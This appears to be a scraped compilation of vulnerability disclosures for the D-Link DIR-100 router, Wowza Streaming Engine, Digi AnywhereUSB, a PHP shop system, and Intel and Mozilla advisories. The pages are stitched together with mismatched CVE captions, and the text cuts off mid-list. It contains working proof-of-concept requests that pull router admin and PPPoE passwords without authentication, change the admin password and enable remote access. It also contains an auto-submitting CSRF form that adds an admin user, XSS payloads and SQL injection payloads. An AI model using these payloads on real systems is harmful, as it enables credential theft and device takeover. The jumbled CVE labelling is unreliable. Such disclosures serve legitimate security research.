D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters

    * Title: Router D-Link DIR-100 Multiple Vulnerabilities
    * Date: 2013-09-19
    * Author: Felix Richter
    * Contact: root@euer.krebsco.de
    * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
    * Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
    * Report Version: 2.0
    * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
    * Vulnerable: D-Link DIR-100
        * Hardware Revision: D1
        * Software Version: 4.03B07 (from 2012-04-10)
    * CVE Numbers: 
        * CWE-287 Authentication Issues:             CVE-2013-7051
        * CWE-255 Issues with Credential Management: CVE-2013-7052
        * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053
        * CWE-79  Cross-Site Scripting:              CVE-2013-7054
        * CWE-200 Information Disclosure:            CVE-2013-7055
    * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
    * State: Patched by Vendor
    * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
    
    # Table of Contents
    
        1. Background
        2. Vulnerability Description
        3. Technical Description
        4. Severity and Remediation
        5. Timeline
    
    # 1. Background
    
    The DIR-100 is designed for easy and robust connectivity among heterogeneous
    standards-based network devices. Computers can communicate directly with this
    router for automatic opening and closing of UDP/TCP ports to take full
    advantage of the security provided without sacrificing functionality of on-line
    applications.
    
    # 2 Vulnerability Description
    
    Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
    Broadband Router Revision D (and potentially other devices sharing the 
    affected firmware) that could allow a remote attacker:
    
     - Retrieve the Administrator password without authentication leading to
       authentication bypass [CWE-255]
     - Retrieve sensitive configuration paramters like the pppoe username and
       password without authentication [CWE-200]
     - Execute privileged Commands without authentication through a race
       condition leading to weak authentication enforcement [CWE-287]
     - Sending formatted request to a victim which then will execute arbitrary
       commands on the device (CSRF) [CWE-352]
     - Store arbitrary javascript code which will be executed when a victim
       accesses the administrator interface [CWE-79]
    
    CVE-Numbers for these vulnerabilities has not yet been assigned.
    
    # 3 Technical Description of the Vulnerabilities
    
    ## 3.0 The DIR-100 Web Interface and CGI
    
    The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
    unauthenticated users and `/cli.cgi` for authenticated requests.
    
    list of features provided by each cgi-script can be retrieved by:
    
        curl 'http://192.168.1.104/cliget.cgi?cmd=help'
        # and respectively when authenticated
        curl 'http://192.168.1.104/cli.cgi?cmd=help'
    
    ## 3.1 Authentication Bypass
    
    ### Description
    
    The administrator password is not protected in any way on the device, every
    attacker with access to the administrator interface which listens on port 80.
    For retrieving the Administrator password the request must not be
    authenticated. 
    
    
    ### Proof of Concept
    
    The web interface provides two distinct ways to retrieve the adminstrator
    password:
    
        curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
        curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
    
    ## 3.2 Weak Authentication
    
    ### Description
    
    As soon as a user is logged into the administration interface, the cli CGI
    is `unlocked` and can be used by without authenticating before as
    the cgi-script does not check any other authentication parameters such as
    cookies or HTTP Parameters. The only access check is if the IP-Address is 
    the same. 
    
    ### Proof of Concept
        
        # open the router interface in a web browser and log in
        firefox  'http://192.168.0.1/' 
        
        # open a new terminal or another web-browser which is currently not logged
        # in and try to access
    
        curl 'http://192.168.0.1/cli.cgi?cmd=help'
    
        # this request will be authenticated and it will not be redirected to the
        # login page. If no user is logged in, the request will be redirected to
        # the login 
    
    ## 3.3 Retrieve sensitive information
    
    ### Description
    
    Besides retrieving the administrator password without authentication it is
    possible to retrieve other sensitive configuration from the device as well like
    the PPTP and poe Username and Password, as well as the configured dyndns
    username and password and configured mail log credentials when these parameters
    are configured. 
    No authentication is requred.
    
    ### Proof of Concept
    
        curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
        curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
    
    ## 3.4 Cross-Site Request Forgery (CSRF)
    
    ### Description
    
    CSRF attacks can be launched by sending a formatted request to a victim, then
    tricking the victim into loading the request (often automatically), which
    makes it appear that the request came from the victim. As an example the
    attacker could change the administrator password (see Proof of Concept code)
    and enable system remote access.
    
    ### Proof of Concept
    
    Changing the password for administrator can be done when the ip-address is
    authenticated:
    
        # Log into DIR-100
        curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    
        # Change password
        curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
    
        # enable remote console
        curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
    
    ## 3.5 Cross-Site Scripting (XSS)
    
    ### Description
    
    It is possible for an authenticated user to store information on the server
    which will not be checked on the server side for special characters which
    results in persistent Cross-Site Scripting Vulnerabilities. With this
    vulnerabilty the victim (administrator) will run javascript code in the 
    context of the D-Link DIR-100.
    
    XSS is possible because only on the client side (javascript code) the input is
    filtered and validated, sending data directly to the CGI scripts.
    
    ### Proof of Concept
    
        # Log into DIR-100
        curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    
        #  XSS in Static IP Address Tab
        curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
    
        # XSS in Scheduler tab
        curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
    
    # 4 Severity and Remediation
    
    This exploits are considered very critical, especially when the feature of remote
    administration is activated on the system.  
    Weak authentication, together with cross-site request forgery and authentication 
    bypass can result in a full device compromise from an arbitrary website the victim is
    accessing, even if the device has remote administration deactivated on the
    internet-port. It is recommended to upgrade the router with the newest firmware
    of the D-Link DIR-100.
    
    # 5 Timeline
    
    2013-09-13 - First Contact with D-Link Support
    2013-09-19 - Sent Report
    2013-10-14 - Request Status update, Response: Beta will be available mid October
    2013-12-02 - Vendor publishes Firmware Update 
    2013-12-11 - Request CVE-IDs
    2013-12-18 - Publish the report

CVE-2013-7051: Offensive Security’s Exploit Database Archive

Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code.

CVE-2016-2031: Full Disclosure: Aruba ArubaOS/Aruba Instant/AirWave Management

Wowza Streaming Engine 4.8.0 and earlier from multiple authenticated XSS vulnerabilities via the (1) customList%5B0%5D.value field in enginemanager/server/serversetup/edit_adv.htm of the Server Setup configuration or the (2) host field in enginemanager/j_spring_security_check of the login form. This issue was resolved in Wowza Streaming Engine 4.8.5.

Wowza Streaming Engine 4.7.7 and 4.7.8 suffers from multiple authenticated XSS vulnerabilities via the (1) customList%5B0%5D.value field in enginemanager/server/serversetup/edit\_adv.htm of the Server Setup configuration or the (2) host field in enginemanager/j\_spring\_security\_check of the login form.

**XSS(1)**

User input is used inside a javascript function. By crafting a special payload, it is possible to alter the function and inject malicious content without breaking functionality.

  
By sending the following payload:

    POST /enginemanager/server/serversetup/edit_adv.htm HTTP/1.1
    Host: 172.17.60.171:8088
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://172.17.60.171:8088/enginemanager/Home.htm
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 383
    Cookie: JSESSIONID=2bd567a3c22e0d2d7b4fdb9f6b935c48; lastMangerHost=http%3A//localhost%3A8087; showRightRail=true; lastTab=Advanced; DoNotShowFTU=true
    Connection: close
    
    vhost=_defaultVHost_&advSection=Custom&customList%5B0%5D.documented=false&customList%5B0%5D.enabled=true&customList%5B0%5D.type=String&customList%5B0%5D.sectionName=Server&customList%5B0%5D.section=%2FRoot%2FServer&customList%5B0%5D.name=asdasd&customList%5B0%5D.removed=false&customList%5B0%5D.value=asala";} alert("XSS ServerSetup"); if("true") { var a = "&advPath=%2FRoot%2FServer
    

  
The initTableDataProperties() function gets injected with malitious code:

    HTTP/1.1 200 OK Server: Winstone Servlet Engine v1.0.5 Content-Type: text/html;charset=UTF-8 Connection: Close Date: Tue, 22 Jan 2019 13:34:59 GMT X-Powered-By: Servlet/2.5 (Winstone/1.0.5) Content-Language: en 
    ***TRUNCATED***
    <script>
    var tblDataProperties = new Array();
    var tblIdxProperties=0;
    
    initTableDataProperties();
    updateTableProperties();
    
    function initTableDataProperties()
    {
    	
    		if("true") 
    		{
    			var newItem = new Object();
    			newItem.orgIdx = tblIdxProperties++;
    			newItem.added=false;
    			newItem.removed="false"==="true";
    			newItem.enabled="true"==="true";
    			newItem.name="asdasd";
    			newItem.value="asala";} alert("XSS ServerSetup"); if("true") { var a = "";
    			newItem.type="String";
    			newItem.section="/Root/Server";
    			newItem.sectionName="Server";
    			newItem.documented="false"==="true";
    			newItem.uiBooleanValue="false"==="true";
    			tblDataProperties.push(newItem);
    		}
    		
    	
    }
    ***TRUNCATED***
    

  
The injected code runs in the client browser:

**XSS(2)**

Request:

    POST /enginemanager/j_spring_security_check?wowza-page-redirect= HTTP/1.1
    Host: 192.168.1.180:8088
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.180:8088/enginemanager/login.htm
    Cookie: JSESSIONID=324c96d4de48fedbc282e9718f35f56d; DoNotShowFTU=true; lastMangerHost=http%3A//http%3A//192.168.1.180%3A8088%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E; showRightRail=true; lastTab=Basic
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 167
    
    wowza-page-redirect=&j_username=ffff&j_password=ffff&authType=digest&host=http%3A%2F%2Fhttp%3A%2F%2F192.168.1.180%3A8088%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
    

Response:

    HTTP/1.1 200 OK 
    Server: Winstone Servlet Engine v1.0.5 
    Content-Type: text/html;charset=UTF-8 
    Connection: Close Date: Sun, 27 Jan 2019 22:31:56 GMT 
    X-Powered-By: Servlet/2.5 (Winstone/1.0.5) 
    Content-Language: en 
    ***TRUNCATED***
    			Sign In
    	
    
    				</h2>
    				
    					<div id="loginError" class="alert alert-danger"
    						style="word-wrap: break-word">
    						
    						Wowza Streaming Engine Manager could not connect to the Wowza Streaming Engine service(http://http://192.168.1.180:8088<script>alert("XSS")</script>). Verify that the Wowza Streaming Engine service has started and is running.
    					</div>
    
    ***TRUNCATED***

CVE-2019-7655: Disclosures/CVE-2019-7655-XSS-Wowza at master · DrunkenShells/Disclosures

Wowza Streaming Engine 4.8.0 and earlier suffers from multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes such as adding another admin user via enginemanager/server/user/edit.htm in the Server->Users component. This issue was resolved in Wowza Streaming Engine 4.8.5.

The Wowza Streaming Engine 4.7.7 build 20181108145350 and 4.7.8 build 20191105123929 applications suffer from multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes like adding another admin user.

**Evidence**

Admin users: 

An authenticated admin user can be tricked into accessing a page containing the following code:

    <html> 
    <body onload='document.frm1.submit();'> 
     <script>history.pushState('', '', '/')</script> 
     <form name="frm1" action="http://192.168.1.180:8088/enginemanager/server/user/edit.htm" method="POST"> 
     <input type="hidden" name="version" value="0" /> 
     <input type="hidden" name="action" value="new" /> 
     <input type="hidden" name="userName" value="wowadmin3" /> 
     <input type="hidden" name="userPassword" value="wowadmin3" /> 
     <input type="hidden" name="userPassword2" value="wowadmin3" /> 
     <input type="hidden" name="accessLevel" value="admin" /> 
     <input type="hidden" name="advUser" value="true" /> 
     <input type="hidden" name="advUser" value="on" /> 
     <input type="hidden" name="ignoreWarnings" value="false" /> 
     <input type="submit" value="Submit request" /> 
     </form> 
     </body> 
    </html>
    

He then unknowingly will make a request that adds another application admin user (wowadmin3):

    POST /enginemanager/server/user/edit.htm HTTP/1.1
    Host: 192.168.1.180:8088
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://wowtest.com/
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 150
    
    version=0&action=new&userName=wowadmin3&userPassword=wowadmin3&userPassword2=wowadmin3&accessLevel=admin&advUser=true&_advUser=on&ignoreWarnings=false

CVE-2019-7654: Disclosures/CVE-2019-7654-CSRF-Wowza at master · DrunkenShells/Disclosures

Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors Data Leakage Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-0548

Description: Cleanup errors in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 2.8 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

CVEID: CVE-2020-0549

Description: Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

A list of impacted products can be found here.

**Recommendations:**

Intel recommends that users of affected Intel® Processors update to the latest version firmware provided by the system manufacturer that addresses these issues. 

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode:   

GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

Additional technical details about these vulnerabilities can be found at:  

https://software.intel.com/security-software-guidance/software-guidance/l1d-eviction-sampling

https://software.intel.com/security-software-guidance/software-guidance/vector-register-sampling

Additional Advisory Guidance on CVE-2020-0548, CVE 2020-0549 available here.

**Acknowledgements:**

Intel would like to thank the following individuals for finding, reporting and coordinating these vulnerabilities to us.

Intel thanks TU Graz and KU Leuven for disclosure of CVE-2020-0549.

Graz University of Technology: Moritz Lipp, Michael Schwarz, Daniel Gruss. 

KU Leuven: Jo Van Bulck.

Intel thanks VU Amsterdam, for disclosure of CVE-2020-0548 and CVE-2020-0549. VUSec group at VU Amsterdam: Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida. 

Researchers from TU Graz and Ku Leuven provided Intel with a Proof of Concept (POC) in May 2019 and researchers from VU Amsterdam provided Proof of Concept (POC) in October 2019. Intel subsequently confirmed each submission demonstrates CVE-2020-0549 individually.

**Revision History**

Revision

Date

Description

1.0

01/27/2020

Initial Release

1.1

06/09/2020

Updated Recomendations

1.2

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-0549: INTEL-SA-00329

Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.

Vulnerability Type: Cross Site Scripting (XSS) Vulnerability

Vendor of Product: Digi International

Affected Product Code Base: AnywhereUSB - 14

Firmware Version: 1.93.21.19

Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.

Attack Vectors: Someone must open a link for the Digi Page

Attack Type: Remote

Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Steps To Reproduce

1\. Browse the Web Page of the Digi’s AnywhereUSB and trying not to log in

2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim

Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1

Host: Target IP

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

CVE-2019-18859: Cross Site Scripting (XSS) Vulnerability

After a HelloRetryRequest has been sent, the client may negotiate a lower protocol that TLS 1.3, resulting in an invalid state transition in the TLS State Machine. If the client gets into this state, incoming Application Data records will be ignored. This vulnerability affects Firefox < 72.

Sorry, I can't find "_1590001?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-17023: Invalid Bug ID

By using a form with a data URI it was possible to gain access to the privileged JSONView object that had been cloned into content. Impact from exposing this object appears to be minimal, however it was a bypass of existing defense in depth mechanisms. This vulnerability affects Firefox < 70, Thunderbird < 68.2, and Firefox ESR < 68.2.

**Mozilla Foundation Security Advisory 2019-35**

Announced

October 22, 2019

Impact

critical

Products

Thunderbird

Fixed in

*   Thunderbird 68.2

**#CVE-2019-15903: Heap overflow in expat library in XML\_GetCurrentLineNumber**

Reporter

Sebastian Pipping

Impact

high

**Description**

In libexpat before 2.2.8, crafted XML input could fool the parser into changing from DTD parsing to document parsing too early. A subsequent call to XML_GetCurrentLineNumber or XML_GetCurrentColumnNumber then resulted in a heap-based buffer over-read.

**References**

*   Bug 1584907

**#CVE-2019-11757: Use-after-free when creating index updates in IndexedDB**

Reporter

Zhanjia Song

Impact

high

**Description**

When following the value's prototype chain, it was possible to retain a reference to a locale, delete it, and subsequently reference it. This resulted in a use-after-free and a potentially exploitable crash.

**References**

*   Bug 1577107

**#CVE-2019-11758: Potentially exploitable crash due to 360 Total Security**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla community member Philipp reported a memory safety bug present in Firefox 68 when 360 Total Security was installed. This bug showed evidence of memory corruption in the accessibility engine and we presume that with enough effort that it could be exploited to run arbitrary code.

**References**

*   Bug 1536227

**#CVE-2019-11759: Stack buffer overflow in HKDF output**

Reporter

Guido Vranken

Impact

moderate

**Description**

An attacker could have caused 4 bytes of HMAC output to be written past the end of a buffer stored on the stack. This could be used by an attacker to execute arbitrary code or more likely lead to a crash.

**References**

*   Bug 1577953

**#CVE-2019-11760: Stack buffer overflow in WebRTC networking**

Reporter

Nils

Impact

moderate

**Description**

A fixed-size stack buffer could overflow in nrappkit when doing WebRTC signaling. This resulted in a potentially exploitable crash in some instances.

**References**

*   Bug 1577719

**#CVE-2019-11761: Unintended access to a privileged JSONView object**

Reporter

Cody Crews

Impact

moderate

**Description**

By using a form with a data URI it was possible to gain access to the privileged JSONView object that had been cloned into content. Impact from exposing this object appears to be minimal, however it was a bypass of existing defense in depth mechanisms.

**References**

*   Bug 1561502

**#CVE-2019-11762: document.domain-based origin isolation has same-origin-property violation**

Reporter

Kris Maglione

Impact

moderate

**Description**

If two same-origin documents set document.domain differently to become cross-origin, it was possible for them to call arbitrary DOM methods/getters/setters on the now-cross-origin window.

**References**

*   Bug 1582857

**#CVE-2019-11763: Incorrect HTML parsing results in XSS bypass technique**

Reporter

Gareth Heyes

Impact

moderate

**Description**

Failure to correctly handle null bytes when processing HTML entities resulted in Firefox incorrectly parsing these entities. This could have led to HTML comment text being treated as HTML which could have led to XSS in a web application under certain conditions. It could have also led to HTML entities being masked from filters - enabling the use of entities to mask the actual characters of interest from filters.

**References**

*   Bug 1584216

**#CVE-2019-11764: Memory safety bugs fixed in Thunderbird 68.2**

Reporter

Mozilla developers and community

Impact

critical

**Description**

Mozilla developers and community members Bob Clary, Jason Kratzer, Aaron Klotz, Iain Ireland, Tyson Smith, Christian Holler, Steve Fink, Honza Bambas, Byron Campen, and Cristian Brindusan reported memory safety bugs present in Firefox 69 and Firefox ESR 68.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 70 and Firefox ESR 68.2

CVE-2019-11761: Security vulnerabilities fixed in - Thunderbird 68.2

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
    # Google Dork: N/A
    # Date: 2020-01-03
    # Exploit Author: Chris Inzinga
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    # CVE: N/A
    
    # The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
    # SQL injection in multiple areas. The most severe of these is the username 
    # parameter on the login page as this injection can be done unauthenticated.
    
    
    ================================ 'username' - SQLi ================================
    
    POST /dfsms/index.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    username=test&password=test&login=
    
    ---
    Parameter: username (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'category' & 'categorycode' - SQLi ================================
    
    POST /dfsms/add-category.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/add-category.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 39
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    category=test&categorycode=test&submit=
    
    ---
    Parameter: category (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    ---
    Parameter: categorycode (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'companyname' - SQLi ================================
    
    ---
    Parameter: companyname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'productname' & 'productprice' - SQLi ================================
    
    ---
    Parameter: productname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
    ---
    ---
    Parameter: productprice (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'fromdate' & 'todate' - SQLi ================================
    
    ---
    Parameter: todate (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 5 columns
        Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
    
    Parameter: fromdate (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
    ---
    
    
    
    ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
    
    ---
    Parameter: emailid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: adminname (POST)
        Type: time-based blind
